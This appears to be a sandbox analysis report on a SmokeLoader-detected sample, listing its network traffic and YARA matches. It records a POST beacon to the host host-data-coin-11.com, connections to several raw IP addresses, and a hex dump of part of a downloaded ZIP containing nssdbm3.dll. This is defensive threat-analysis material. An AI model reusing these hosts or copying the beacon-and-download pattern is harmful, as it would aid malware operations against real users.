                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 11:30:29 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.797504069.000001A784BB1000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.797504069.000001A784BB1000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rrooukv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49791 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49810 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49886 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 16.2.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.1.adijaeg.400000.0.unpack, type: UNPACKEDPE
